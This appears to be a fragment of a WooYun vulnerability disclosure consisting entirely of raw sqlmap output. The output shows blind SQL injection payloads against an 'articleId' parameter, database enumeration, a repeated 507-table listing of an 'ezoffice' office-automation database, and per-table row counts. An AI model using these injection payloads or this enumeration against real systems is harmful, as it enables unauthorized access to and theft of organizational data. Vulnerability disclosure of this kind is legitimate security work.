WooYun.org

sqlmap identified the following injection points with a total of 242 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] `default`
[*] ezoffice
[*] information_schema
[*] mysql
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
+--------------------------------+
| bookmarks                      |
| cms_advert                     |
| cms_advert_place               |
| cms_arti_chan_ip               |
| cms_arti_channel               |
| cms_arti_channel_sql           |
| cms_arti_comment               |
| cms_arti_content               |
| cms_arti_draft                 |
| cms_arti_draft_channel         |
| cms_arti_draft_content         |
| cms_arti_draft_use             |
| cms_arti_keyword               |
| cms_arti_links                 |
| cms_arti_operation             |
| cms_arti_publish               |
| cms_arti_rela_word             |
| cms_arti_source                |
| cms_arti_state                 |
| cms_arti_type                  |
| cms_arti_version               |
| cms_article                    |
| cms_article_statistic          |
| cms_channel_statistic          |
| cms_config                     |
| cms_content_style              |
| cms_files                      |
| cms_filter_word                |
| cms_hotline                    |
| cms_interview                  |
| cms_interview_guest            |
| cms_interview_info             |
| cms_ip_limit                   |
| cms_ips                        |
| cms_jobinfor                   |
| cms_member                     |
| cms_member_group               |
| cms_message                    |
| cms_message_reply              |
| cms_messagecategory            |
| cms_module                     |
| cms_module_operation           |
| cms_operation_log              |
| cms_page                       |
| cms_publish_task               |
| cms_ques_item                  |
| cms_ques_person                |
| cms_ques_text                  |
| cms_ques_topic                 |
| cms_questionnaire              |
| cms_role                       |
| cms_ruesume                    |
| cms_seq                        |
| cms_ship                       |
| cms_site                       |
| cms_site_statistic             |
| cms_site_tmpl_task             |
| cms_synch_oa_article           |
| cms_synch_oa_channel           |
| cms_system_ftp                 |
| cms_system_log                 |
| cms_templates                  |
| cms_templates_files            |
| cms_tmpl_citation              |
| cms_tmpl_file_operation        |
| cms_userpower                  |
| cms_version                    |
| cms_vote                       |
| cms_vote_item                  |
| cms_vote_person                |
| document                       |
| document_file                  |
| document_history               |
| document_signature             |
| document_signature_web         |
| ex_elecfile                    |
| ex_receivefile                 |
| ex_receivefilelocal            |
| ex_sendfilelocal               |
| ex_unit                        |
| gj_csdetail                    |
| gj_csmaster                    |
| gj_dossier                     |
| gj_dossierfile                 |
| gj_drawdept                    |
| gj_empchangetype               |
| gj_employeechange              |
| gj_fileinfo                    |
| gj_fileslave                   |
| gj_filetype                    |
| gj_goods                       |
| gj_goodsstock                  |
| gj_goodstype                   |
| gj_pactlist                    |
| gj_pactlistfile                |
| gj_ptdetail                    |
| gj_ptmaster                    |
| gj_qulity                      |
| gj_qulity_file                 |
| gj_qulity_fileacce             |
| gj_skwj                        |
| gj_skwj_dw                     |
| gj_skwj_file                   |
| gj_skwj_fileacce               |
| gj_ssdetail                    |
| gj_ssmaster                    |
| gj_station                     |
| gj_stock                       |
| gj_stock_goodstype             |
| gj_stockchange                 |
| gj_typedefine                  |
| gj_workattendance              |
| gj_workcheck                   |
| gj_worklog                     |
| gov_comefileunit               |
| gov_documentsendfile           |
| gov_documentunit               |
| gov_employee                   |
| gov_fileread                   |
| gov_fileread_accessory         |
| gov_largemeeting               |
| gov_largemeetingappend         |
| gov_largemeetingbrowse         |
| gov_largemeetingnobrowse       |
| gov_largemeetingorg            |
| gov_largemeetingperson         |
| gov_largemeetingrelapse        |
| gov_largemoduleorg             |
| gov_largemoduleperson          |
| gov_largermodule               |
| gov_leaderaction               |
| gov_leaderactionitem           |
| gov_leaderactionweekreport     |
| gov_meeting                    |
| gov_meetingaddress             |
| gov_meetingappend              |
| gov_meetingbrowser             |
| gov_meetingclass               |
| gov_meetingcrux                |
| gov_meetingnobrowser           |
| gov_meetingperson              |
| gov_meetingrelapse             |
| gov_meetingshare               |
| gov_meetingsubject             |
| gov_meetingsubjectappend       |
| gov_meetingsubjectcomment      |
| gov_meetingsubjectcommentcheck |
| gov_meetingsubjectidea         |
| gov_meetingunit                |
| gov_name                       |
| gov_onduty                     |
| gov_ondutyitem                 |
| gov_ondutyphonerecord          |
| gov_ondutyphonerecordidea      |
| gov_organization               |
| gov_organization_user          |
| gov_pleasecheck                |
| gov_pleasecheckcomment         |
| gov_receiveassociate           |
| gov_receivedocumentbaseinfo    |
| gov_receivefile                |
| gov_receivefileseq             |
| gov_receivefiletype            |
| gov_rfcategory                 |
| gov_rfcategory_t               |
| gov_sendassociate              |
| gov_senddocumentbaseinfo       |
| gov_senddocumentnum            |
| gov_senddocumentseq            |
| gov_senddocumenttopical        |
| gov_senddocumentupdate         |
| gov_senddocumentword           |
| gov_sendfile_user              |
| gov_sendfilebrowser            |
| gov_sendfilecheck              |
| gov_sendfilecheck_accessory    |
| gov_sendfilecheckcomment       |
| gov_sendfilecheckwithwf_acc    |
| gov_sendfilecheckwithwf_access |
| gov_sendfilecheckwithworkflow  |
| gov_sendfilefeedback           |
| gov_sendfilenobrowser          |
| gov_sendfilereceivefileorg     |
| gov_telgraphcheck              |
| gov_telgraphcheckcomment       |
| gov_topicword                  |
| gov_typeset                    |
| gov_wflowresave                |
| htmldocument                   |
| htmlhistory                    |
| htmlsignature                  |
| ms_accountbook                 |
| ms_count                       |
| ms_infodescribe                |
| ms_infoflow                    |
| ms_infolist                    |
| ms_limit                       |
| ms_message_price               |
| ms_model                       |
| ms_outmo                       |
| oa_allattach                   |
| oa_answersheet                 |
| oa_answersheetcontent          |
| oa_answersheetoption           |
| oa_archivesborrow              |
| oa_archivesclass               |
| oa_archivesdossier             |
| oa_archivesdossieraccessory    |
| oa_archivesfile                |
| oa_archivesfileaccessory       |
| oa_associateinfo               |
| oa_bdroomappaccessory          |
| oa_bdroomapptype               |
| oa_bdroomequ                   |
| oa_birthdayset                 |
| oa_birthdaywish                |
| oa_boardroom                   |
| oa_boardroom_executestatus     |
| oa_boardroom_meetingtime       |
| oa_boardroom_persons           |
| oa_boardroomapply              |
| oa_books                       |
| oa_booksdetail                 |
| oa_booksoutlay                 |
| oa_bookstype                   |
| oa_borrowapply                 |
| oa_budget                      |
| oa_budgetdetail                |
| oa_budgetequipment             |
| oa_cardclass                   |
| oa_cardemp_field               |
| oa_cardemp_fieldlength         |
| oa_cardempinfo                 |
| oa_cardorder                   |
| oa_cardordercontent            |
| oa_cardorderinfo               |
| oa_channelbakup                |
| oa_channelposition             |
| oa_custmenu                    |
| oa_custmenu_qlcase             |
| oa_customdesktoplayout         |
| oa_customform                  |
| oa_deffield                    |
| oa_deflist                     |
| oa_deflistfield                |
| oa_defshowrelation             |
| oa_deftable                    |
| oa_departmentstyle             |
| oa_desktopset                  |
| oa_diary                       |
| oa_diaryclass                  |
| oa_dictionary                  |
| oa_district                    |
| oa_dossier                     |
| oa_dossier_accessory           |
| oa_dossier_borrow              |
| oa_dossier_category            |
| oa_dossier_para                |
| oa_duty                        |
| oa_emp_attendance              |
| oa_emp_compo                   |
| oa_emp_inhabitancy             |
| oa_emp_inhabitancy_con         |
| oa_emp_performancecheck        |
| oa_emp_socialinsurance         |
| oa_empmaildomain               |
| oa_empmaildomain2              |
| oa_emptype                     |
| oa_emptype_emp                 |
| oa_equipment                   |
| oa_equipmentapply              |
| oa_equipmenttype               |
| oa_event                       |
| oa_eventattender               |
| oa_eventshare                  |
| oa_examination_answer          |
| oa_examination_answer_item     |
| oa_examination_item            |
| oa_examination_manage          |
| oa_examination_personnel       |
| oa_examination_selftest        |
| oa_examination_selftest_item   |
| oa_examination_stock           |
| oa_examination_type            |
| oa_festivalset                 |
| oa_forum                       |
| oa_forumclass                  |
| oa_gnome                       |
| oa_harddisk                    |
| oa_headseal                    |
| oa_hortationpunishclass        |
| oa_hprecord                    |
| oa_iformationcaccessory        |
| oa_inforhistoryaccessory       |
| oa_information                 |
| oa_informationaccessory        |
| oa_informationbrowser          |
| oa_informationccompany         |
| oa_informationchannel          |
| oa_informationcollect          |
| oa_informationcomment          |
| oa_informationhead             |
| oa_informationhistory          |
| oa_informationseal             |
| oa_informationtemplate         |
| oa_infororgstat                |
| oa_inforpersonalstat           |
| oa_infotmationccompany         |
| oa_iso_borrowuser              |
| oa_iso_paper                   |
| oa_isocomment                  |
| oa_isodeallog                  |
| oa_keepwatchplan               |
| oa_keepwatchplan_detail        |
| oa_library                     |
| oa_linkman                     |
| oa_linkmanclass                |
| oa_mail_user                   |
| oa_mailaccessory               |
| oa_mailattach                  |
| oa_maildeputy                  |
| oa_mailinterior                |
| oa_maillogin                   |
| oa_mailset                     |
| oa_mailuserbox                 |
| oa_maturity_alert_settings     |
| oa_menuset                     |
| oa_menusetdomain               |
| oa_mysubscibe                  |
| oa_netaddress                  |
| oa_netaddressclass             |
| oa_netaddressdel               |
| oa_netaddressshare             |
| oa_netaddressshow              |
| oa_netdisk_file                |
| oa_netharddiskclass            |
| oa_netsurvey                   |
| oa_netsurveyitem               |
| oa_netsurveyvote               |
| oa_notebook                    |
| oa_notepaper                   |
| oa_officaldiction              |
| oa_optionset                   |
| oa_orgwrap                     |
| oa_patchinfo                   |
| oa_personal_kind               |
| oa_personalstat                |
| oa_personoa_feedback           |
| oa_personoa_press              |
| oa_personoa_user_press_relatio |
| oa_persononduty                |
| oa_pigeonholeset               |
| oa_posttitle                   |
| oa_press                       |
| oa_pressset                    |
| oa_project                     |
| oa_project_task                |
| oa_project_type                |
| oa_projectstep                 |
| oa_questheme                   |
| oa_questionnaire               |
| oa_recordtype                  |
| oa_relationdata                |
| oa_relationmodule              |
| oa_relationobject              |
| oa_remind                      |
| oa_seq                         |
| oa_soundremind                 |
| oa_soundset                    |
| oa_subject                     |
| oa_sysnumber                   |
| oa_task                        |
| oa_taskaccessory               |
| oa_taskclass                   |
| oa_taskexec                    |
| oa_taskhistory                 |
| oa_taskhistoryaccessory        |
| oa_taskperiodicity             |
| oa_taskperiodicityaccessory    |
| oa_taskremind                  |
| oa_taskreport                  |
| oa_taskreportaccessory         |
| oa_themeoption                 |
| oa_trainclass                  |
| oa_trainrecord                 |
| oa_unitinfo                    |
| oa_userchannel                 |
| oa_voiture                     |
| oa_voitureapply                |
| oa_voitureauditing             |
| oa_voiturecancel               |
| oa_voiturefee                  |
| oa_voiturefeedback             |
| oa_voituremaintain             |
| oa_voituresend                 |
| oa_voituretype                 |
| oa_waitpigeonhole              |
| oa_wishcard                    |
| oa_workaddress                 |
| oa_workingday                  |
| oa_worklog                     |
| oa_worklogcomment              |
| oa_workproject                 |
| oa_workprojectclass            |
| oa_workprojecttask             |
| oa_workproxy                   |
| oa_workreport                  |
| oa_workreport_transmit         |
| oa_workreportleader            |
| oa_workreportpostil            |
| oa_workreporttemplate          |
| oa_ysgl_bdp                    |
| oa_ysgl_bmys                   |
| oa_ysgl_bmysls                 |
| oa_ysgl_cgsq                   |
| oa_ysgl_cgsqys                 |
| oa_ysgl_ejfl                   |
| oa_ysgl_kjkm                   |
| oa_ysgl_txkm                   |
| oa_ysgl_txkz                   |
| oa_ysgl_yjfl                   |
| oa_ysgl_ys                     |
| oa_ysgl_ysft                   |
| oa_ysgl_ysls                   |
| oa_ysgl_zc                     |
| oa_ysgl_zcb                    |
| org_domain                     |
| org_employee                   |
| org_employee_competence        |
| org_employee_contract          |
| org_employee_edustory          |
| org_employee_trainhistory      |
| org_employee_work              |
| org_group                      |
| org_handrole                   |
| org_manager                    |
| org_organization               |
| org_organization_user          |
| org_right                      |
| org_rightscope                 |
| org_role                       |
| org_role_exchange              |
| org_role_right                 |
| org_syncrtx                    |
| org_user_group                 |
| org_user_role                  |
| record_workflow                |
| security_database              |
| security_dog                   |
| security_ip                    |
| security_log                   |
| security_log_module            |
| security_onlineuser            |
| signature                      |
| tablerelation                  |
| tarea                          |
| tareatype                      |
| tbakup                         |
| tcode                          |
| telt                           |
| template                       |
| template_bookmarks             |
| template_file                  |
| tfield                         |
| tlimit                         |
| tlocate                        |
| tlocated                       |
| tmodel                         |
| tpage                          |
| tpageref                       |
| tseq                           |
| tsession                       |
| tshow                          |
| tsign                          |
| tsql                           |
| ttable                         |
| ttype                          |
| version_file                   |
| wf_activity                    |
| wf_dealwith                    |
| wf_dealwithcomment             |
| wf_dealwithlog                 |
| wf_graph_unit                  |
| wf_immobilityfield             |
| wf_immobilityform              |
| wf_needflowmodule              |
| wf_onlineuser                  |
| wf_package                     |
| wf_press                       |
| wf_proceedactivity             |
| wf_proceedflow                 |
| wf_proceedpress                |
| wf_proceedprotectcontrol       |
| wf_proceedreadwritecontrol     |
| wf_proceedtr                   |
| wf_proceedtransition           |
| wf_processscope                |
| wf_protectcontrol              |
| wf_randflowcomment             |
| wf_readwritecontrol            |
| wf_transition                  |
| wf_transitionrestriction       |
| wf_work                        |
| wf_workflowchannel             |
| wf_workflowprocess             |
| wf_workflowstock               |
| wf_workflowwritecontrol        |
+--------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
[507 tables]
+--------------------------------+
| bookmarks                      |
| cms_advert                     |
| cms_advert_place               |
| cms_arti_chan_ip               |
| cms_arti_channel               |
| cms_arti_channel_sql           |
| cms_arti_comment               |
| cms_arti_content               |
| cms_arti_draft                 |
| cms_arti_draft_channel         |
| cms_arti_draft_content         |
| cms_arti_draft_use             |
| cms_arti_keyword               |
| cms_arti_links                 |
| cms_arti_operation             |
| cms_arti_publish               |
| cms_arti_rela_word             |
| cms_arti_source                |
| cms_arti_state                 |
| cms_arti_type                  |
| cms_arti_version               |
| cms_article                    |
| cms_article_statistic          |
| cms_channel_statistic          |
| cms_config                     |
| cms_content_style              |
| cms_files                      |
| cms_filter_word                |
| cms_hotline                    |
| cms_interview                  |
| cms_interview_guest            |
| cms_interview_info             |
| cms_ip_limit                   |
| cms_ips                        |
| cms_jobinfor                   |
| cms_member                     |
| cms_member_group               |
| cms_message                    |
| cms_message_reply              |
| cms_messagecategory            |
| cms_module                     |
| cms_module_operation           |
| cms_operation_log              |
| cms_page                       |
| cms_publish_task               |
| cms_ques_item                  |
| cms_ques_person                |
| cms_ques_text                  |
| cms_ques_topic                 |
| cms_questionnaire              |
| cms_role                       |
| cms_ruesume                    |
| cms_seq                        |
| cms_ship                       |
| cms_site                       |
| cms_site_statistic             |
| cms_site_tmpl_task             |
| cms_synch_oa_article           |
| cms_synch_oa_channel           |
| cms_system_ftp                 |
| cms_system_log                 |
| cms_templates                  |
| cms_templates_files            |
| cms_tmpl_citation              |
| cms_tmpl_file_operation        |
| cms_userpower                  |
| cms_version                    |
| cms_vote                       |
| cms_vote_item                  |
| cms_vote_person                |
| document                       |
| document_file                  |
| document_history               |
| document_signature             |
| document_signature_web         |
| ex_elecfile                    |
| ex_receivefile                 |
| ex_receivefilelocal            |
| ex_sendfilelocal               |
| ex_unit                        |
| gj_csdetail                    |
| gj_csmaster                    |
| gj_dossier                     |
| gj_dossierfile                 |
| gj_drawdept                    |
| gj_empchangetype               |
| gj_employeechange              |
| gj_fileinfo                    |
| gj_fileslave                   |
| gj_filetype                    |
| gj_goods                       |
| gj_goodsstock                  |
| gj_goodstype                   |
| gj_pactlist                    |
| gj_pactlistfile                |
| gj_ptdetail                    |
| gj_ptmaster                    |
| gj_qulity                      |
| gj_qulity_file                 |
| gj_qulity_fileacce             |
| gj_skwj                        |
| gj_skwj_dw                     |
| gj_skwj_file                   |
| gj_skwj_fileacce               |
| gj_ssdetail                    |
| gj_ssmaster                    |
| gj_station                     |
| gj_stock                       |
| gj_stock_goodstype             |
| gj_stockchange                 |
| gj_typedefine                  |
| gj_workattendance              |
| gj_workcheck                   |
| gj_worklog                     |
| gov_comefileunit               |
| gov_documentsendfile           |
| gov_documentunit               |
| gov_employee                   |
| gov_fileread                   |
| gov_fileread_accessory         |
| gov_largemeeting               |
| gov_largemeetingappend         |
| gov_largemeetingbrowse         |
| gov_largemeetingnobrowse       |
| gov_largemeetingorg            |
| gov_largemeetingperson         |
| gov_largemeetingrelapse        |
| gov_largemoduleorg             |
| gov_largemoduleperson          |
| gov_largermodule               |
| gov_leaderaction               |
| gov_leaderactionitem           |
| gov_leaderactionweekreport     |
| gov_meeting                    |
| gov_meetingaddress             |
| gov_meetingappend              |
| gov_meetingbrowser             |
| gov_meetingclass               |
| gov_meetingcrux                |
| gov_meetingnobrowser           |
| gov_meetingperson              |
| gov_meetingrelapse             |
| gov_meetingshare               |
| gov_meetingsubject             |
| gov_meetingsubjectappend       |
| gov_meetingsubjectcomment      |
| gov_meetingsubjectcommentcheck |
| gov_meetingsubjectidea         |
| gov_meetingunit                |
| gov_name                       |
| gov_onduty                     |
| gov_ondutyitem                 |
| gov_ondutyphonerecord          |
| gov_ondutyphonerecordidea      |
| gov_organization               |
| gov_organization_user          |
| gov_pleasecheck                |
| gov_pleasecheckcomment         |
| gov_receiveassociate           |
| gov_receivedocumentbaseinfo    |
| gov_receivefile                |
| gov_receivefileseq             |
| gov_receivefiletype            |
| gov_rfcategory                 |
| gov_rfcategory_t               |
| gov_sendassociate              |
| gov_senddocumentbaseinfo       |
| gov_senddocumentnum            |
| gov_senddocumentseq            |
| gov_senddocumenttopical        |
| gov_senddocumentupdate         |
| gov_senddocumentword           |
| gov_sendfile_user              |
| gov_sendfilebrowser            |
| gov_sendfilecheck              |
| gov_sendfilecheck_accessory    |
| gov_sendfilecheckcomment       |
| gov_sendfilecheckwithwf_acc    |
| gov_sendfilecheckwithwf_access |
| gov_sendfilecheckwithworkflow  |
| gov_sendfilefeedback           |
| gov_sendfilenobrowser          |
| gov_sendfilereceivefileorg     |
| gov_telgraphcheck              |
| gov_telgraphcheckcomment       |
| gov_topicword                  |
| gov_typeset                    |
| gov_wflowresave                |
| htmldocument                   |
| htmlhistory                    |
| htmlsignature                  |
| ms_accountbook                 |
| ms_count                       |
| ms_infodescribe                |
| ms_infoflow                    |
| ms_infolist                    |
| ms_limit                       |
| ms_message_price               |
| ms_model                       |
| ms_outmo                       |
| oa_allattach                   |
| oa_answersheet                 |
| oa_answersheetcontent          |
| oa_answersheetoption           |
| oa_archivesborrow              |
| oa_archivesclass               |
| oa_archivesdossier             |
| oa_archivesdossieraccessory    |
| oa_archivesfile                |
| oa_archivesfileaccessory       |
| oa_associateinfo               |
| oa_bdroomappaccessory          |
| oa_bdroomapptype               |
| oa_bdroomequ                   |
| oa_birthdayset                 |
| oa_birthdaywish                |
| oa_boardroom                   |
| oa_boardroom_executestatus     |
| oa_boardroom_meetingtime       |
| oa_boardroom_persons           |
| oa_boardroomapply              |
| oa_books                       |
| oa_booksdetail                 |
| oa_booksoutlay                 |
| oa_bookstype                   |
| oa_borrowapply                 |
| oa_budget                      |
| oa_budgetdetail                |
| oa_budgetequipment             |
| oa_cardclass                   |
| oa_cardemp_field               |
| oa_cardemp_fieldlength         |
| oa_cardempinfo                 |
| oa_cardorder                   |
| oa_cardordercontent            |
| oa_cardorderinfo               |
| oa_channelbakup                |
| oa_channelposition             |
| oa_custmenu                    |
| oa_custmenu_qlcase             |
| oa_customdesktoplayout         |
| oa_customform                  |
| oa_deffield                    |
| oa_deflist                     |
| oa_deflistfield                |
| oa_defshowrelation             |
| oa_deftable                    |
| oa_departmentstyle             |
| oa_desktopset                  |
| oa_diary                       |
| oa_diaryclass                  |
| oa_dictionary                  |
| oa_district                    |
| oa_dossier                     |
| oa_dossier_accessory           |
| oa_dossier_borrow              |
| oa_dossier_category            |
| oa_dossier_para                |
| oa_duty                        |
| oa_emp_attendance              |
| oa_emp_compo                   |
| oa_emp_inhabitancy             |
| oa_emp_inhabitancy_con         |
| oa_emp_performancecheck        |
| oa_emp_socialinsurance         |
| oa_empmaildomain               |
| oa_empmaildomain2              |
| oa_emptype                     |
| oa_emptype_emp                 |
| oa_equipment                   |
| oa_equipmentapply              |
| oa_equipmenttype               |
| oa_event                       |
| oa_eventattender               |
| oa_eventshare                  |
| oa_examination_answer          |
| oa_examination_answer_item     |
| oa_examination_item            |
| oa_examination_manage          |
| oa_examination_personnel       |
| oa_examination_selftest        |
| oa_examination_selftest_item   |
| oa_examination_stock           |
| oa_examination_type            |
| oa_festivalset                 |
| oa_forum                       |
| oa_forumclass                  |
| oa_gnome                       |
| oa_harddisk                    |
| oa_headseal                    |
| oa_hortationpunishclass        |
| oa_hprecord                    |
| oa_iformationcaccessory        |
| oa_inforhistoryaccessory       |
| oa_information                 |
| oa_informationaccessory        |
| oa_informationbrowser          |
| oa_informationccompany         |
| oa_informationchannel          |
| oa_informationcollect          |
| oa_informationcomment          |
| oa_informationhead             |
| oa_informationhistory          |
| oa_informationseal             |
| oa_informationtemplate         |
| oa_infororgstat                |
| oa_inforpersonalstat           |
| oa_infotmationccompany         |
| oa_iso_borrowuser              |
| oa_iso_paper                   |
| oa_isocomment                  |
| oa_isodeallog                  |
| oa_keepwatchplan               |
| oa_keepwatchplan_detail        |
| oa_library                     |
| oa_linkman                     |
| oa_linkmanclass                |
| oa_mail_user                   |
| oa_mailaccessory               |
| oa_mailattach                  |
| oa_maildeputy                  |
| oa_mailinterior                |
| oa_maillogin                   |
| oa_mailset                     |
| oa_mailuserbox                 |
| oa_maturity_alert_settings     |
| oa_menuset                     |
| oa_menusetdomain               |
| oa_mysubscibe                  |
| oa_netaddress                  |
| oa_netaddressclass             |
| oa_netaddressdel               |
| oa_netaddressshare             |
| oa_netaddressshow              |
| oa_netdisk_file                |
| oa_netharddiskclass            |
| oa_netsurvey                   |
| oa_netsurveyitem               |
| oa_netsurveyvote               |
| oa_notebook                    |
| oa_notepaper                   |
| oa_officaldiction              |
| oa_optionset                   |
| oa_orgwrap                     |
| oa_patchinfo                   |
| oa_personal_kind               |
| oa_personalstat                |
| oa_personoa_feedback           |
| oa_personoa_press              |
| oa_personoa_user_press_relatio |
| oa_persononduty                |
| oa_pigeonholeset               |
| oa_posttitle                   |
| oa_press                       |
| oa_pressset                    |
| oa_project                     |
| oa_project_task                |
| oa_project_type                |
| oa_projectstep                 |
| oa_questheme                   |
| oa_questionnaire               |
| oa_recordtype                  |
| oa_relationdata                |
| oa_relationmodule              |
| oa_relationobject              |
| oa_remind                      |
| oa_seq                         |
| oa_soundremind                 |
| oa_soundset                    |
| oa_subject                     |
| oa_sysnumber                   |
| oa_task                        |
| oa_taskaccessory               |
| oa_taskclass                   |
| oa_taskexec                    |
| oa_taskhistory                 |
| oa_taskhistoryaccessory        |
| oa_taskperiodicity             |
| oa_taskperiodicityaccessory    |
| oa_taskremind                  |
| oa_taskreport                  |
| oa_taskreportaccessory         |
| oa_themeoption                 |
| oa_trainclass                  |
| oa_trainrecord                 |
| oa_unitinfo                    |
| oa_userchannel                 |
| oa_voiture                     |
| oa_voitureapply                |
| oa_voitureauditing             |
| oa_voiturecancel               |
| oa_voiturefee                  |
| oa_voiturefeedback             |
| oa_voituremaintain             |
| oa_voituresend                 |
| oa_voituretype                 |
| oa_waitpigeonhole              |
| oa_wishcard                    |
| oa_workaddress                 |
| oa_workingday                  |
| oa_worklog                     |
| oa_worklogcomment              |
| oa_workproject                 |
| oa_workprojectclass            |
| oa_workprojecttask             |
| oa_workproxy                   |
| oa_workreport                  |
| oa_workreport_transmit         |
| oa_workreportleader            |
| oa_workreportpostil            |
| oa_workreporttemplate          |
| oa_ysgl_bdp                    |
| oa_ysgl_bmys                   |
| oa_ysgl_bmysls                 |
| oa_ysgl_cgsq                   |
| oa_ysgl_cgsqys                 |
| oa_ysgl_ejfl                   |
| oa_ysgl_kjkm                   |
| oa_ysgl_txkm                   |
| oa_ysgl_txkz                   |
| oa_ysgl_yjfl                   |
| oa_ysgl_ys                     |
| oa_ysgl_ysft                   |
| oa_ysgl_ysls                   |
| oa_ysgl_zc                     |
| oa_ysgl_zcb                    |
| org_domain                     |
| org_employee                   |
| org_employee_competence        |
| org_employee_contract          |
| org_employee_edustory          |
| org_employee_trainhistory      |
| org_employee_work              |
| org_group                      |
| org_handrole                   |
| org_manager                    |
| org_organization               |
| org_organization_user          |
| org_right                      |
| org_rightscope                 |
| org_role                       |
| org_role_exchange              |
| org_role_right                 |
| org_syncrtx                    |
| org_user_group                 |
| org_user_role                  |
| record_workflow                |
| security_database              |
| security_dog                   |
| security_ip                    |
| security_log                   |
| security_log_module            |
| security_onlineuser            |
| signature                      |
| tablerelation                  |
| tarea                          |
| tareatype                      |
| tbakup                         |
| tcode                          |
| telt                           |
| template                       |
| template_bookmarks             |
| template_file                  |
| tfield                         |
| tlimit                         |
| tlocate                        |
| tlocated                       |
| tmodel                         |
| tpage                          |
| tpageref                       |
| tseq                           |
| tsession                       |
| tshow                          |
| tsign                          |
| tsql                           |
| ttable                         |
| ttype                          |
| version_file                   |
| wf_activity                    |
| wf_dealwith                    |
| wf_dealwithcomment             |
| wf_dealwithlog                 |
| wf_graph_unit                  |
| wf_immobilityfield             |
| wf_immobilityform              |
| wf_needflowmodule              |
| wf_onlineuser                  |
| wf_package                     |
| wf_press                       |
| wf_proceedactivity             |
| wf_proceedflow                 |
| wf_proceedpress                |
| wf_proceedprotectcontrol       |
| wf_proceedreadwritecontrol     |
| wf_proceedtr                   |
| wf_proceedtransition           |
| wf_processscope                |
| wf_protectcontrol              |
| wf_randflowcomment             |
| wf_readwritecontrol            |
| wf_transition                  |
| wf_transitionrestriction       |
| wf_work                        |
| wf_workflowchannel             |
| wf_workflowprocess             |
| wf_workflowstock               |
| wf_workflowwritecontrol        |
+--------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleId=759 AND 4227=4227
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: articleId=759 AND SLEEP(5)
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Database: ezoffice
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| cms_site_statistic          | 8072284 |
| cms_channel_statistic       | 1164104 |
| cms_article_statistic       | 831459  |
| cms_operation_log           | 12956   |
| cms_system_log              | 11010   |
| oa_district                 | 2476    |
| cms_arti_operation          | 1508    |
| cms_arti_content            | 1402    |
| cms_article                 | 1402    |
| cms_arti_version            | 1213    |
| security_log                | 990     |
| cms_files                   | 826     |
| cms_templates_files         | 552     |
| org_role_right              | 213     |
| cms_tmpl_citation           | 202     |
| cms_config                  | 197     |
| wf_immobilityfield          | 193     |
| org_syncrtx                 | 191     |
| cms_arti_channel            | 106     |
| wf_readwritecontrol         | 94      |
| org_right                   | 85      |
| cms_module_operation        | 75      |
| oa_eventattender            | 64      |
| org_user_role               | 59      |
| oa_custmenu                 | 55      |
| oa_menuset                  | 55      |
| org_rightscope              | 43      |
| tshow                       | 37      |
| cms_message                 | 34      |
| security_log_module         | 25      |
| oa_patchinfo                | 19      |
| tsign                       | 19      |
| wf_needflowmodule           | 17      |
| wf_package                  | 17      |
| wf_immobilityform           | 16      |
| oa_diaryclass               | 15      |
| org_employee                | 15      |
| template_bookmarks          | 15      |
| cms_userpower               | 14      |
| org_organization_user       | 14      |
| bookmarks                   | 12      |
| tareatype                   | 9       |
| ms_model                    | 8       |
| wf_transition               | 8       |
| cms_message_reply           | 7       |
| org_organization            | 7       |
| org_user_group              | 7       |
| cms_module                  | 6       |
| cms_page                    | 6       |
| cms_templates               | 5       |
| document                    | 5       |
| document_file               | 5       |
| oa_departmentstyle          | 5       |
